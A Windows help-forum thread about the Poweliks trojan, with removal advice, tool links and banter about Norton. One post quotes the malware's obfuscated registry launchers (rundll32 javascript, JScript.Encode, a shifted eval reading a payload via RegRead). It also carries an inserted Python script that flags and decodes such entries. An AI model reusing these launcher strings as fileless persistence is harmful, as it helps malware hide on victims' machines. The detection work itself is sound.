Trojan.Poweliks


  1. Posts : 58
    Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
       #1

    Trojan.Poweliks


    Well, picked up a nasty Trojan Wednesday and after working on it that night and the next morning I gave up and let Norton's support tech take care of it. Watch out for "Trojan.Poweliks", which looks like "TROJAN.AdClicker Activity" and some routine messing with MS PowerShell. This was the first one of those things in 50-plus years in the computer world that was over my head. It was not from this site, but I know which one. How it got me is a total mystery. It appears to be attacking military-related sites.


  2. Posts : 53,365
    Windows 10 Home x64
       #2


  3. Posts : 461
    Win 10 Pro x64, Win 7 Pro x64
       #3

    Poweliks is malware with rootkit-like features: it resides in the registry (and loads in memory), is persistent, and is not present as a file that can be scanned and removed easily. The payload (malware file) is stored in an encrypted registry value and is loaded at boot time by a key calling the rundll32 process with an encrypted JavaScript payload.

    Associated Poweliks Windows Registry Information:

    HTML Code:
    HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current 
    
    HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1
    
    HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 " " = "rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"
    
    HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 "a" = "<data to execute>" 
    Once the payload is loaded, it executes an embedded PowerShell script in silent mode. That PowerShell script contains another encoded payload, which is injected into a legitimate dllhost process (the persistent item); that process acts as a trojan downloader for other malware and is also responsible for protecting the registry value by recreating it when it is removed.

    Removal can be attained with these tools (+ additional scans - AV, MBAM, HitmanPro among others) after disabling/removing the persistent item.

    Farbar Recovery Scan Tool: Farbar Recovery Scan Tool Download
    RogueKiller (by Tigzy): Poweliks removal with RogueKiller
    ESET Poweliks Cleaner How do I remove a Poweliks infection? - ESET Knowledgebase

    The trojan wrecks several Windows "defense" services - Security Center, Defender, Windoze Update, Firewall, etc.
    ESET Svcs Repair http://kb.eset.com/library/ESET/KB%2...icesRepair.exe <<<Direct DL link

    ETA: Relevant links/analysis/removal instrux:

    KernelMode.info
    http://kb.eset.com/esetkb/index?page...nt&id=SOLN3587
    http://www.adlice.com/poweliks-remov...h-roguekiller/
    http://www.bleepingcomputer.com/viru...oweliks-trojan
    Last edited by Urthboundmisfit; 13 Dec 2014 at 05:43. Reason: add relevant links
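The persistence chain described in this post (a registry-resident launcher, rundll32.exe with a javascript: URL that loads mshtml/RunHTMLApplication, JScript.Encode or a one-character shift to hide the script, and RegRead to pull the real payload out of another registry value) can be checked for mechanically. The Python below is an added example, not code from this thread or from FRST, RogueKiller or ESET: it takes FRST-style listing lines like the ones quoted above, flags each of those traits, and reverses the charCodeAt()-1 shift wrapper so an analyst can read that the CLSID launcher merely fetches its script from the "a" value. The parsing regexes, indicator labels and sample listing (modelled on the lines above, with the JScript.Encode blob truncated; that encoding is only detected, not decoded) are this example's own assumptions.

```python
"""Triage FRST-style registry listing lines for Poweliks-style fileless persistence.

Added example, not code from the forum thread or from FRST, RogueKiller or ESET.
It checks each autorun / CLSID line for the traits post #3 describes: a Run value
or LocalServer32 command that launches rundll32.exe with a javascript: URL, loads
mshtml/RunHTMLApplication, reads the real payload back out of the registry with
RegRead, and hides the script behind JScript.Encode (the "#@~^" marker) or a
per-character shift wrapper.  The shift wrapper is reversed so the analyst can
read what the launcher does; the JScript.Encode blob is only flagged.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators matched against the value data (the command line / script text).
INDICATORS = [
    ("rundll32-javascript", re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I)),
    ("mshtml-runhtmlapplication", re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)),
    ("registry-stored-payload", re.compile(r"\bRegRead\s*\(", re.I)),
    ("jscript-encode", re.compile(r"jscript\.encode|#@~\^", re.I)),
    ("char-shift-obfuscation", re.compile(r"charCodeAt\(\)\s*[+-]\s*\d+", re.I)),
]

# eval("<text>".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))
# FRST keeps the script's own %20 escapes, so accept either "%20" or whitespace.
SHIFT_RE = re.compile(
    r'eval\("(?P<text>.*?)"\.replace\(/\./g,\s*function\(_\)\{return(?:%20|\s)'
    r'String\.fromCharCode\(_\.charCodeAt\(\)(?P<sign>[+-])(?P<amount>\d+)\);\}\)\)',
    re.I,
)

# Line shapes as FRST prints them (assumed from the listing quoted in post #3).
RUN_RE = re.compile(r'^(?P<key>\S+?):\s*\[(?P<name>[^\]]*)\]\s*=>\s*(?P<value>.*)$')
CLSID_RE = re.compile(r'^(?P<key>\S+)\s+"(?P<name>[^"]*)"\s*=\s*(?P<value>.*?)\s*$')


@dataclass
class Finding:
    key: str
    name: str
    indicators: List[str]
    decoded: Optional[str] = None  # shift wrapper undone, if one was present


def unshift(text: str, sign: str, amount: str) -> str:
    """Undo String.fromCharCode(c.charCodeAt() <sign> <amount>) applied to every character."""
    delta = int(amount) if sign == "+" else -int(amount)
    return "".join(chr(ord(c) + delta) for c in text)


def parse_line(line: str):
    """Return (key, value name, value data) for a Run or LocalServer32 line, else None."""
    for rx in (RUN_RE, CLSID_RE):
        m = rx.match(line.strip())
        if m:
            value = m.group("value").strip()
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]  # FRST wraps LocalServer32 data in quotes
            return m.group("key"), m.group("name"), value
    return None


def suspicious_name(name: str) -> bool:
    """Poweliks used a non-printable value name; FRST shows it as [] or with * and <> placeholders."""
    return name.strip() == "" or not all(c.isalnum() or c in "_-. ()" for c in name)


def triage(line: str) -> Optional[Finding]:
    parsed = parse_line(line)
    if parsed is None:
        return None
    key, name, value = parsed
    hits = [label for label, rx in INDICATORS if rx.search(value)]
    if not hits:  # a benign autorun: an odd value name alone does not flag it
        return None
    decoded = None
    m = SHIFT_RE.search(value)
    if m:
        decoded = unshift(m.group("text"), m.group("sign"), m.group("amount"))
        # rescan the recovered text: RegRead / jscript.encode only appear after decoding
        hits += ["decoded:" + label for label, rx in INDICATORS if rx.search(decoded)]
    if suspicious_name(name):
        hits.append("hidden-value-name")
    return Finding(key, name, hits, decoded)


def triage_listing(text: str) -> List[Finding]:
    return [f for f in (triage(line) for line in text.splitlines()) if f is not None]


# Constructed sample: one benign autorun plus lines modelled on the FRST output quoted
# in post #3 (the JScript.Encode blob is truncated at "[...]").
SAMPLE_LISTING = r'''
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [OneDrive] => C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s [...]
HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 " " = "rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"
HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 "a" = "<data to execute>"
'''

if __name__ == "__main__":
    for f in triage_listing(SAMPLE_LISTING):
        print(f"{f.key}  name={f.name!r}  {', '.join(f.indicators)}")
        if f.decoded:
            print("   decoded launcher:", f.decoded)
```

Run as-is it reports three findings: the two Run values and the LocalServer32 launcher, whose decoded text is a document.write of a jscript.encode script pulled via RegRead from the "a" value under the same CLSID. The benign OneDrive line and the bare "a" data value are not reported, because the value name is treated as supporting evidence only and the opaque data carries none of the command-line indicators.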


  4. Posts : 58
    Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
    Thread Starter
       #4

    Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....


  5. Posts : 461
    Win 10 Pro x64, Win 7 Pro x64
       #5

    False positive...
    VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
    Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

    Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

    Did you read thru the comprehensive links in my post? :)

    ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
    Last edited by Urthboundmisfit; 13 Dec 2014 at 08:41.


  6. Posts : 461
    Win 10 Pro x64, Win 7 Pro x64
       #6

    dustymars said:
    Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....
    Wait, whut???? I thought Norton support tech "took care of it"

    dustymars said:
    Well, picked up a nasty Trojan Wednesday...I gave up and let Norton's support tech take care of it. ...
    Apparently, not so much. Are you still infected?


  7. Posts : 58
    Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
    Thread Starter
       #7

    Urthboundmisfit said:
    False positive...
    VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
    Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

    Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

    Did you read thru the comprehensive links in my post? :)

    ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
    I use SUPERAntiSpyware, AdwCleaner, MBAM, I forget some, SpyBot maybe, and MalwareBytes' Anti Rootkit, but none of them got rid of it. Norton's did and I checked it out, no more Trojan. I suspect some would like us to get rid of Norton's and buy their product? This is what I say, “Non Gradus Anus Rodentum..”

    I said, Norton's did not like the link you posted, so I will not discard it just because you suggest it. There are other ways to get it done. No, I am not infected, or at least no traces of it are in my PC.


  8. Posts : 461
    Win 10 Pro x64, Win 7 Pro x64
       #8

    dustymars said:
    ...I suspect some would like us to get rid of Norton's and buy their product? This is what I say, “Non Gradus Anus Rodentum..”
    My misunderstanding, though by your wording ("now what") I was under the impression you were still infected/had lingering effects.

    I've never paid a cent EVER for any AV, never recommended any AV and never will. I am currently using Avast Free with only File system shield & Web shield... none of the other bells whistles & shiny objects being presented as "protection" these days.

    As for Norton, to each his own, hence "YMMV". BTW, you're welcome for the info/links etc.

    Unsubscribing...


  9. Posts : 58
    Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
    Thread Starter
       #9

    Plus, I certainly do not trust Microsoft for any security for my PC given the glitches in their updates of late and holes they somehow forget in their software. While some of the professional hackers may have the knowhow and some amateur hackers may have a few brain cells left, they are not smart enough to find the holes and make malware/viruses, so it has to be some insider selling the information or a former disgruntled employee selling the information. I would not put it past the so-called anti-virus guys doing evil deeds either. Never trust anyone on the Net -- not even its inventor, Al Gore.

    The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.


  10. Posts : 7,781
    Win 7 32 Home Premium, Win 7 64 Pro, Win 8.1, Win 10
       #10

    dustymars said:
    The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.
    Yepperz, lots of scam e-mails this time of year.

    https://www.sevenforums.com/security-...irmations.html


 
